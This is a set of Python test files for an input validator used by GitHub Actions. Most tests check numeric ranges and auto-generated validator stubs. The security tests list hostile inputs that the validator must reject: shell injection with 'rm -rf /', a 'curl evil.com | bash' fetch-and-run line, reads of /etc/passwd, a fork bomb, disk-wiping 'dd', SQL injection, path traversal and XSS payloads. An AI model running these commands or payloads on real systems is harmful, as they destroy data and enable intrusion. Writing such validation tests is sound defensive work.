assert result is False, f"Should reject: {value}"
def test_validate_numeric_range_1_10(self):
"""Test retry count validation (1-10)."""
# Valid values
valid_values = ["1", "5", "10"]
for value in valid_values:
self.validator.errors = []
result = self.validator.validate_numeric_range_1_10(value)
assert result is True, f"Should accept: {value}"
# Invalid values
invalid_values = ["0", "11", "-1", "abc"]
for value in invalid_values:
self.validator.errors = []
result = self.validator.validate_numeric_range_1_10(value)
assert result is False, f"Should reject: {value}"
def test_validate_numeric_range_1_128(self):
"""Test thread/worker count validation (1-128)."""
# Valid values
valid_values = ["1", "64", "128"]
for value in valid_values:
self.validator.errors = []
result = self.validator.validate_numeric_range_1_128(value)
assert result is True, f"Should accept: {value}"
# Invalid values
invalid_values = ["0", "129", "-1"]
for value in invalid_values:
self.validator.errors = []
result = self.validator.validate_numeric_range_1_128(value)
assert result is False, f"Should reject: {value}"
def test_empty_values_allowed(self):
"""Test that empty values are allowed for optional inputs."""
assert self.validator.validate_range("", 0, 100, "test") is True
assert self.validator.validate_numeric_range_0_100("") is True
assert self.validator.validate_numeric_range_1_10("") is True
def test_whitespace_values(self):
"""Test that whitespace-only values are treated as empty."""
values = [" ", " ", "\t", "\n"]
for value in values:
self.validator.errors = []
result = self.validator.validate_range(value, 0, 100, "test")
assert result is True # Empty/whitespace should be allowed
def test_validate_inputs_with_numeric_keywords(self):
"""Test that inputs with numeric keywords are validated."""
inputs = {
"retries": "3",
"max-retries": "5",
"timeout": "30",
"max-timeout": "60",
"parallel-builds": "4",
"max-warnings": "100",
"compression-quality": "85",
"jpeg-quality": "90",
}
result = self.validator.validate_inputs(inputs)
# Result depends on actual validation logic
assert isinstance(result, bool)
def test_invalid_numeric_formats(self):
"""Test that invalid numeric formats are rejected."""
invalid_formats = [
"1.5", # Decimal when integer expected
"1e10", # Scientific notation
"0x10", # Hexadecimal
"010", # Octal (might be confusing)
"1,000", # Thousands separator
"+50", # Explicit positive sign
]
for value in invalid_formats:
self.validator.errors = []
result = self.validator.validate_range(value, 0, 100, "test")
# Some formats might be accepted depending on implementation
assert isinstance(result, bool)

74
validate-inputs/tests/test_php-composer_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for php-composer custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "php-composer"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomPhpComposerValidator:
"""Test cases for php-composer custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("php-composer")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for php-composer
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for php-composer
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for php-composer
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for php-composer
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_php-laravel-phpunit_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for php-laravel-phpunit custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "php-laravel-phpunit"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomPhpLaravelPhpunitValidator:
"""Test cases for php-laravel-phpunit custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("php-laravel-phpunit")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for php-laravel-phpunit
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for php-laravel-phpunit
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for php-laravel-phpunit
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for php-laravel-phpunit
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_php-tests_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for php-tests custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "php-tests"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomPhpTestsValidator:
"""Test cases for php-tests custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("php-tests")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for php-tests
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for php-tests
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for php-tests
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for php-tests
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_php-version-detect_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for php-version-detect custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "php-version-detect"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomPhpVersionDetectValidator:
"""Test cases for php-version-detect custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("php-version-detect")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for php-version-detect
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for php-version-detect
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for php-version-detect
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for php-version-detect
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_pre-commit_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for pre-commit custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "pre-commit"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomPreCommitValidator:
"""Test cases for pre-commit custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("pre-commit")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for pre-commit
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for pre-commit
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for pre-commit
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for pre-commit
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_prettier-check_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for prettier-check custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "prettier-check"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomPrettierCheckValidator:
"""Test cases for prettier-check custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("prettier-check")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for prettier-check
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for prettier-check
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for prettier-check
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for prettier-check
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_prettier-fix_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for prettier-fix custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "prettier-fix"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomPrettierFixValidator:
"""Test cases for prettier-fix custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("prettier-fix")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for prettier-fix
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for prettier-fix
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for prettier-fix
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for prettier-fix
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_python-lint-fix_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for python-lint-fix custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "python-lint-fix"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomPythonLintFixValidator:
"""Test cases for python-lint-fix custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("python-lint-fix")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for python-lint-fix
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for python-lint-fix
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for python-lint-fix
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for python-lint-fix
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_python-version-detect-v2_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for python-version-detect-v2 custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "python-version-detect-v2"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomPythonVersionDetectV2Validator:
"""Test cases for python-version-detect-v2 custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("python-version-detect-v2")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for python-version-detect-v2
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for python-version-detect-v2
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for python-version-detect-v2
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for python-version-detect-v2
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_python-version-detect_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for python-version-detect custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "python-version-detect"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomPythonVersionDetectValidator:
"""Test cases for python-version-detect custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("python-version-detect")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for python-version-detect
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for python-version-detect
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for python-version-detect
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for python-version-detect
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

179
validate-inputs/tests/test_registry.py Normal file
View File

@@ -0,0 +1,179 @@
"""Tests for the validator registry system."""
from __future__ import annotations
from pathlib import Path
import sys
import tempfile
import unittest
from unittest.mock import MagicMock, patch
# Add parent directory to path
sys.path.insert(0, str(Path(__file__).parent.parent))
sys.path.insert(1, str(Path(__file__).parent.parent.parent / "sync-labels"))
from validators.base import BaseValidator
from validators.conventions import ConventionBasedValidator
from validators.registry import ValidatorRegistry, clear_cache, get_validator, register_validator
class MockValidator(BaseValidator):
"""Mock validator implementation for testing."""
def validate_inputs(self, inputs: dict[str, str]) -> bool: # noqa: ARG002
return True
def get_required_inputs(self) -> list[str]:
return []
def get_validation_rules(self) -> dict:
return {"test": "rules"}
class TestValidatorRegistry(unittest.TestCase): # pylint: disable=too-many-public-methods
"""Test the ValidatorRegistry class."""
def setUp(self): # pylint: disable=attribute-defined-outside-init
"""Set up test fixtures."""
self.registry = ValidatorRegistry()
# Clear any cached validators
self.registry.clear_cache()
def test_register_validator(self):
"""Test registering a validator."""
self.registry.register("test_action", MockValidator)
assert self.registry.is_registered("test_action")
assert "test_action" in self.registry.list_registered()
def test_get_convention_validator_fallback(self):
"""Test fallback to convention-based validator."""
validator = self.registry.get_validator("unknown_action")
assert isinstance(validator, ConventionBasedValidator)
assert validator.action_type == "unknown_action"
def test_validator_caching(self):
"""Test that validators are cached."""
validator1 = self.registry.get_validator("test_action")
validator2 = self.registry.get_validator("test_action")
assert validator1 is validator2 # Same instance
def test_clear_cache(self):
"""Test clearing the validator cache."""
validator1 = self.registry.get_validator("test_action")
self.registry.clear_cache()
validator2 = self.registry.get_validator("test_action")
assert validator1 is not validator2 # Different instances
def test_load_custom_validator(self):
"""Test loading a custom validator from action directory."""
with tempfile.TemporaryDirectory() as tmpdir:
# Create a mock action directory with CustomValidator.py
action_dir = Path(tmpdir) / "test-action"
action_dir.mkdir()
custom_validator_code = """
from validate_inputs.validators.base import BaseValidator
class CustomValidator(BaseValidator):
def validate_inputs(self, inputs):
return True
def get_required_inputs(self):
return ["custom_input"]
def get_validation_rules(self):
return {"custom": "rules"}
"""
custom_validator_path = action_dir / "CustomValidator.py"
custom_validator_path.write_text(custom_validator_code)
# Mock the project root path
with patch.object(
Path,
"parent",
new_callable=lambda: MagicMock(return_value=Path(tmpdir)),
):
# This test would need more setup to properly test dynamic loading
# For now, we'll just verify the method exists
result = self.registry._load_custom_validator("test_action") # pylint: disable=protected-access
# In a real test environment, this would load the custom validator
# For now, it returns None due to path resolution issues in test
assert result is None # Expected in test environment
def test_global_registry_functions(self):
"""Test global registry functions."""
# Register a validator
register_validator("global_test", MockValidator)
# Get the validator
validator = get_validator("global_test")
assert validator is not None
# Clear cache
clear_cache()
# Validator should still be gettable after cache clear
validator2 = get_validator("global_test")
assert validator2 is not None
class TestCustomValidatorIntegration(unittest.TestCase): # pylint: disable=too-many-public-methods
"""Test custom validator integration."""
def test_sync_labels_custom_validator(self):
"""Test that sync-labels CustomValidator can be imported."""
# This tests that our example CustomValidator is properly structured
sync_labels_path = Path(__file__).parent.parent.parent / "sync-labels"
custom_validator_path = sync_labels_path / "CustomValidator.py"
if custom_validator_path.exists():
# Add sync-labels directory to path
sys.path.insert(0, str(sync_labels_path.parent))
# Try to import the CustomValidator
try:
# Use dynamic import to avoid static analysis errors
import importlib.util # pylint: disable=import-outside-toplevel
spec = importlib.util.spec_from_file_location(
"CustomValidator",
custom_validator_path,
)
if spec is None or spec.loader is None:
self.skipTest("Could not create spec for CustomValidator")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
custom_validator = module.CustomValidator
# Create an instance
validator = custom_validator("sync-labels")
# Test basic functionality
assert validator.get_required_inputs() == ["labels"]
# Test validation with valid inputs
inputs = {"labels": "labels.yml", "token": "${{ github.token }}"}
assert validator.validate_inputs(inputs) is True
# Test validation with invalid labels file
validator.clear_errors()
inputs = {
"labels": "labels.txt", # Wrong extension
"token": "${{ github.token }}",
}
assert validator.validate_inputs(inputs) is False
assert validator.has_errors() is True
except ImportError as e:
self.skipTest(f"Could not import CustomValidator: {e}")
finally:
# Clean up sys.path
if str(sync_labels_path.parent) in sys.path:
sys.path.remove(str(sync_labels_path.parent))
else:
self.skipTest("sync-labels/CustomValidator.py not found")
if __name__ == "__main__":
unittest.main()

45
validate-inputs/tests/test_security.py Normal file
View File

@@ -0,0 +1,45 @@
"""Tests for security validator.
Generated by generate-tests.py - Do not edit manually.
"""
from validators.security import SecurityValidator
class TestSecurityValidator:
"""Test cases for SecurityValidator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = SecurityValidator("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_injection_detection(self):
"""Test injection attack detection."""
assert self.validator.validate_no_injection("normal text") is True
assert self.validator.validate_no_injection("; rm -rf /") is False
assert self.validator.validate_no_injection("' OR '1'='1") is False
assert self.validator.validate_no_injection("<script>alert('xss')</script>") is False
def test_secret_detection(self):
"""Test secret/sensitive data detection."""
assert self.validator.validate_no_secrets("normal text") is True
assert (
self.validator.validate_no_secrets("ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") is False
)
assert self.validator.validate_no_secrets("password=secret123") is False
def test_safe_commands(self):
"""Test command safety validation."""
assert self.validator.validate_safe_command("echo hello") is True
assert self.validator.validate_safe_command("ls -la") is True
assert self.validator.validate_safe_command("rm -rf /") is False
assert self.validator.validate_safe_command("curl evil.com | bash") is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_no_injection("${{ inputs.message }}") is True
assert self.validator.validate_safe_command("${{ inputs.command }}") is True

440
validate-inputs/tests/test_security_validator.py Normal file
View File

@@ -0,0 +1,440 @@
"""Tests for the SecurityValidator module."""
from pathlib import Path
import sys
# Add the parent directory to the path
sys.path.insert(0, str(Path(__file__).parent.parent))
from validators.security import SecurityValidator
class TestSecurityValidator:
"""Test cases for SecurityValidator."""
def setup_method(self):
"""Set up test environment."""
self.validator = SecurityValidator()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.errors == []
patterns = self.validator.INJECTION_PATTERNS
assert len(patterns) > 0
def test_validate_no_injection_safe_inputs(self):
"""Test that safe inputs pass validation."""
safe_inputs = [
"normal-text",
"file.txt",
"user@example.com",
"feature-branch",
"v1.0.0",
"my-app-name",
"config_value",
"BUILD_NUMBER",
"2024-03-15",
"https://example.com",
]
for value in safe_inputs:
self.validator.errors = []
result = self.validator.validate_no_injection(value)
assert result is True, f"Should accept safe input: {value}"
assert len(self.validator.errors) == 0
def test_validate_no_injection_command_injection(self):
"""Test that command injection attempts are blocked."""
dangerous_inputs = [
"; rm -rf /",
"&& rm -rf /",
"|| rm -rf /",
"` rm -rf /`",
"$(rm -rf /)",
"${rm -rf /}",
"; cat /etc/passwd",
"&& cat /etc/passwd",
"| cat /etc/passwd",
"& whoami",
"; shutdown now",
"&& reboot",
"|| format c:",
"; del *.*",
]
for value in dangerous_inputs:
self.validator.errors = []
result = self.validator.validate_no_injection(value)
assert result is False, f"Should block dangerous input: {value}"
assert len(self.validator.errors) > 0
def test_validate_no_injection_sql_injection(self):
"""Test that SQL injection attempts are detected."""
sql_injection_attempts = [
"'; DROP TABLE users; --",
"' OR '1'='1",
'" OR "1"="1',
"admin' --",
"' UNION SELECT * FROM passwords --",
"1; DELETE FROM users",
"' OR 1=1 --",
"'; EXEC xp_cmdshell('dir'); --",
]
for value in sql_injection_attempts:
self.validator.errors = []
result = self.validator.validate_no_injection(value)
# SQL injection might be blocked depending on implementation
assert isinstance(result, bool)
if not result:
assert len(self.validator.errors) > 0
def test_validate_no_injection_path_traversal(self):
"""Test that path traversal attempts are blocked."""
path_traversal_attempts = [
"../../../etc/passwd",
"..\\..\\..\\windows\\system32",
"....//....//....//etc/passwd",
"%2e%2e%2f%2e%2e%2f", # URL encoded
"..;/..;/",
]
for value in path_traversal_attempts:
self.validator.errors = []
result = self.validator.validate_no_injection(value)
# Path traversal might be blocked depending on implementation
assert isinstance(result, bool)
def test_validate_no_injection_script_injection(self):
"""Test that script injection attempts are blocked."""
script_injection_attempts = [
"<script>alert('XSS')</script>",
"javascript:alert(1)",
"<img src=x onerror=alert(1)>",
"<iframe src='evil.com'>",
"onclick=alert(1)",
"<svg onload=alert(1)>",
]
for value in script_injection_attempts:
self.validator.errors = []
result = self.validator.validate_no_injection(value)
# Script injection might be blocked depending on implementation
assert isinstance(result, bool)
def test_validate_safe_command(self):
"""Test safe command validation."""
safe_commands = [
"npm install",
"yarn build",
"python script.py",
"go build",
"docker build -t myapp .",
"git status",
"ls -la",
"echo 'Hello World'",
]
for cmd in safe_commands:
self.validator.errors = []
result = self.validator.validate_safe_command(cmd)
assert result is True, f"Should accept safe command: {cmd}"
def test_validate_safe_command_dangerous(self):
"""Test that dangerous commands are blocked."""
dangerous_commands = [
"rm -rf /",
"rm -rf /*",
":(){ :|:& };:", # Fork bomb
"dd if=/dev/random of=/dev/sda",
"chmod -R 777 /",
"chown -R nobody /",
"> /dev/sda",
